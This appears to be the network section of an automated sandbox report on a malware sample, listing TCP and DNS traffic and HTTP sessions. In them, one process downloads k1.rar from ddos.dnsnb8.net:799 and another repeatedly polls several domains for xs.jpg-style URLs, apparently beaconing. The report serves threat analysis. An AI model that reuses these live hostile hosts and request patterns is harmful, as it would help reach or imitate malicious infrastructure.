Jul 5, 2024 08:00:08.506711960 CEST | 49719 | 80 | 192.168.2.6 | 37.230.104.89
Jul 5, 2024 08:00:08.511606932 CEST | 80 | 49719 | 37.230.104.89 | 192.168.2.6
Jul 5, 2024 08:00:08.747104883 CEST | 80 | 49719 | 37.230.104.89 | 192.168.2.6
Jul 5, 2024 08:00:08.747602940 CEST | 49719 | 80 | 192.168.2.6 | 37.230.104.89
Jul 5, 2024 08:00:09.099657059 CEST | 49720 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:09.104454994 CEST | 80 | 49720 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:09.123538017 CEST | 49720 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:09.129606009 CEST | 49720 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:09.135504007 CEST | 80 | 49720 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:09.862687111 CEST | 80 | 49720 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:09.862761021 CEST | 80 | 49720 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:09.868007898 CEST | 49720 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:09.869509935 CEST | 49720 | 80 | 192.168.2.6 | 54.244.188.177
Jul 5, 2024 08:00:09.874267101 CEST | 80 | 49720 | 54.244.188.177 | 192.168.2.6
Jul 5, 2024 08:00:09.875143051 CEST | 49722 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:09.880110979 CEST | 80 | 49722 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:09.880222082 CEST | 49722 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:09.880390882 CEST | 49722 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:09.885241032 CEST | 80 | 49722 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.366055965 CEST | 80 | 49722 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.366137028 CEST | 49722 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:10.366456985 CEST | 80 | 49722 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.367054939 CEST | 49722 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:10.367414951 CEST | 49722 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:10.369745970 CEST | 49723 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:10.371831894 CEST | 80 | 49722 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.374670029 CEST | 80 | 49723 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.393306971 CEST | 49723 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:10.394244909 CEST | 49723 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:10.399081945 CEST | 80 | 49723 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.894288063 CEST | 80 | 49723 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.894314051 CEST | 80 | 49723 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.898937941 CEST | 49723 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:10.928126097 CEST | 49723 | 80 | 192.168.2.6 | 44.221.84.105
Jul 5, 2024 08:00:10.933029890 CEST | 80 | 49723 | 44.221.84.105 | 192.168.2.6
Jul 5, 2024 08:00:10.938036919 CEST | 49718 | 80 | 192.168.2.6 | 78.46.2.155
Jul 5, 2024 08:00:10.938365936 CEST | 49725 | 80 | 192.168.2.6 | 78.46.2.155
Jul 5, 2024 08:00:10.943144083 CEST | 80 | 49725 | 78.46.2.155 | 192.168.2.6
Jul 5, 2024 08:00:10.943221092 CEST | 80 | 49718 | 78.46.2.155 | 192.168.2.6
Jul 5, 2024 08:00:10.955245018 CEST | 49718 | 80 | 192.168.2.6 | 78.46.2.155
                              Jul 5, 2024 08:00:10.955332994 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:10.955809116 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:10.960565090 CEST804972578.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:11.618431091 CEST804972578.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:11.621129036 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:11.728475094 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.728784084 CEST4972680192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.733541012 CEST804971937.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:11.733584881 CEST804972637.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:11.733597994 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.733670950 CEST4972680192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.733848095 CEST4972680192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.738648891 CEST804972637.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:12.479939938 CEST804972637.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:12.480020046 CEST4972680192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:14.052526951 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:14.052712917 CEST4972680192.168.2.637.230.104.89
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Jul 5, 2024 08:00:01.504060030 CEST | 52747 | 9832 | 192.168.2.6 | 85.17.167.196
                               Jul 5, 2024 08:00:03.315545082 CEST | 63363 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:03.487957954 CEST | 52224 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:03.503974915 CEST | 53 | 52224 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:03.526585102 CEST | 53 | 63363 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:03.565996885 CEST | 55939 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:03.770761967 CEST | 53 | 55939 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:04.657574892 CEST | 49840 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:04.853981018 CEST | 53 | 49840 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:05.824616909 CEST | 50745 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:05.833899975 CEST | 53 | 50745 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:06.102679968 CEST | 55445 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:06.303570032 CEST | 53 | 55445 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:06.834240913 CEST | 60930 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:06.854012012 CEST | 53 | 60930 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:07.662211895 CEST | 58275 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:07.673829079 CEST | 53 | 58275 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:07.677973032 CEST | 53328 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:07.745693922 CEST | 53 | 53328 | 1.1.1.1 | 192.168.2.6
                               Jul 5, 2024 08:00:08.952737093 CEST | 63530 | 53 | 192.168.2.6 | 1.1.1.1
                               Jul 5, 2024 08:00:09.075583935 CEST | 53 | 63530 | 1.1.1.1 | 192.168.2.6
                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                               Jul 5, 2024 08:00:03.315545082 CEST | 192.168.2.6 | 1.1.1.1 | 0xc5c1 | Standard query (0) | ddos.dnsnb8.net | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:03.487957954 CEST | 192.168.2.6 | 1.1.1.1 | 0x7295 | Standard query (0) | althawry.org | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:03.565996885 CEST | 192.168.2.6 | 1.1.1.1 | 0x9c21 | Standard query (0) | www.careerdesk.org | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:04.657574892 CEST | 192.168.2.6 | 1.1.1.1 | 0xcb41 | Standard query (0) | arthur.niria.biz | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:05.824616909 CEST | 192.168.2.6 | 1.1.1.1 | 0xa9c6 | Standard query (0) | amsamex.com | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:06.102679968 CEST | 192.168.2.6 | 1.1.1.1 | 0xb648 | Standard query (0) | apple-pie.in | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:06.834240913 CEST | 192.168.2.6 | 1.1.1.1 | 0xf5f9 | Standard query (0) | ahmediye.net | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:07.662211895 CEST | 192.168.2.6 | 1.1.1.1 | 0x19b0 | Standard query (0) | g2.arrowhitech.com | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:07.677973032 CEST | 192.168.2.6 | 1.1.1.1 | 0xa762 | Standard query (0) | ampyazilim.com.tr | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:08.952737093 CEST | 192.168.2.6 | 1.1.1.1 | 0xed25 | Standard query (0) | althawry.org | A (IP address) | IN (0x0001) | false
                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                               Jul 5, 2024 08:00:03.503974915 CEST | 1.1.1.1 | 192.168.2.6 | 0x7295 | Name error (3) | althawry.org | none | none | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:03.526585102 CEST | 1.1.1.1 | 192.168.2.6 | 0xc5c1 | No error (0) | ddos.dnsnb8.net | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:03.770761967 CEST | 1.1.1.1 | 192.168.2.6 | 0x9c21 | No error (0) | www.careerdesk.org | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:04.853981018 CEST | 1.1.1.1 | 192.168.2.6 | 0xcb41 | No error (0) | arthur.niria.biz | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:05.833899975 CEST | 1.1.1.1 | 192.168.2.6 | 0xa9c6 | Name error (3) | amsamex.com | none | none | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:06.303570032 CEST | 1.1.1.1 | 192.168.2.6 | 0xb648 | No error (0) | apple-pie.in | | 44.221.84.105 | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:06.854012012 CEST | 1.1.1.1 | 192.168.2.6 | 0xf5f9 | No error (0) | ahmediye.net | | 78.46.2.155 | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:07.673829079 CEST | 1.1.1.1 | 192.168.2.6 | 0x19b0 | Name error (3) | g2.arrowhitech.com | none | none | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:07.745693922 CEST | 1.1.1.1 | 192.168.2.6 | 0xa762 | No error (0) | ampyazilim.com.tr | | 37.230.104.89 | A (IP address) | IN (0x0001) | false
                               Jul 5, 2024 08:00:09.075583935 CEST | 1.1.1.1 | 192.168.2.6 | 0xed25 | Name error (3) | althawry.org | none | none | A (IP address) | IN (0x0001) | false
                              • ddos.dnsnb8.net:799
                              • www.careerdesk.org
                              • arthur.niria.biz
                              • apple-pie.in
                              • ahmediye.net
                              • ampyazilim.com.tr
                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.6 | 49710 | 44.221.84.105 | 799 | 5344 | C:\Users\user\AppData\Local\Temp\rksowY.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:03.544014931 CEST | 288 | OUT | GET /cj//k1.rar HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                              Host: ddos.dnsnb8.net:799
                              Connection: Keep-Alive


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               1 | 192.168.2.6 | 49712 | 54.244.188.177 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:03.856779099 CEST | 201 | OUT | GET /images/xs.jpg?5059c3=10531718 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: www.careerdesk.org
                              Cache-Control: no-cache
                               Jul 5, 2024 08:00:04.635207891 CEST | 671 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:04 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               2 | 192.168.2.6 | 49715 | 44.221.84.105 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:04.879864931 CEST | 192 | OUT | GET /xs.jpg?51fbda=48356010 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: arthur.niria.biz
                              Cache-Control: no-cache
                               Jul 5, 2024 08:00:05.376137018 CEST | 662 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:05 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               3 | 192.168.2.6 | 49716 | 44.221.84.105 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:06.311326027 CEST | 195 | OUT | GET /images/xs.jpg?554c8c=39131092 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: apple-pie.in
                              Cache-Control: no-cache
                               Jul 5, 2024 08:00:06.805804014 CEST | 410 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:06 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               4 | 192.168.2.6 | 49718 | 78.46.2.155 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:06.909559965 CEST | 187 | OUT | GET /xs.jpg?5827cf=5777359 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ahmediye.net
                              Cache-Control: no-cache
                               Jul 5, 2024 08:00:07.565737009 CEST | 403 | IN | HTTP/1.1 404 Not Found
                              Date: Fri, 05 Jul 2024 06:00:07 GMT
                              Server: Apache
                              Content-Length: 258
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               5 | 192.168.2.6 | 49719 | 37.230.104.89 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:07.763277054 CEST | 201 | OUT | GET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ampyazilim.com.tr
                              Cache-Control: no-cache
                               Jul 5, 2024 08:00:08.504347086 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                              Connection: Keep-Alive
                              Keep-Alive: timeout=5, max=100
                              content-type: text/html
                              content-length: 707
                              date: Fri, 05 Jul 2024 06:00:08 GMT
                              location: http://ampyazilim.com.tr/images/xs2.jpg?1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                               Jul 5, 2024 08:00:08.506711960 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ampyazilim.com.tr
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                               Jul 5, 2024 08:00:08.747104883 CEST | 646 | IN | HTTP/1.1 200 OK
                              Connection: Keep-Alive
                              Keep-Alive: timeout=5, max=100
                              cache-control: max-age=84600, public
                              expires: Fri, 12 Jul 2024 06:00:08 GMT
                              content-type: image/jpeg
                              last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                              accept-ranges: bytes
                              content-length: 340
                              date: Fri, 05 Jul 2024 06:00:08 GMT
                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                              Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               6 | 192.168.2.6 | 49720 | 54.244.188.177 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:09.129606009 CEST | 306 | OUT | GET /images/xs.jpg?ad5654=34079484 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: www.careerdesk.org
                              Cache-Control: no-cache
                              Cookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
                               Jul 5, 2024 08:00:09.862687111 CEST | 594 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:09 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159209|1720159204|2|2|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               7 | 192.168.2.6 | 49722 | 44.221.84.105 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:09.880390882 CEST | 298 | OUT | GET /xs.jpg?c12b4b=126595310 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: arthur.niria.biz
                              Cache-Control: no-cache
                              Cookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
                               Jul 5, 2024 08:00:10.366055965 CEST | 585 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:10 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159210|1720159205|2|2|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               8 | 192.168.2.6 | 49723 | 44.221.84.105 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:10.394244909 CEST | 301 | OUT | GET /images/xs.jpg?ce2fff=121614327 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: apple-pie.in
                              Cache-Control: no-cache
                              Cookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
                               Jul 5, 2024 08:00:10.894288063 CEST | 333 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:10 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159210|1720159206|2|2|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               9 | 192.168.2.6 | 49725 | 78.46.2.155 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:10.955809116 CEST | 188 | OUT | GET /xs.jpg?e14213=73812575 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ahmediye.net
                              Cache-Control: no-cache
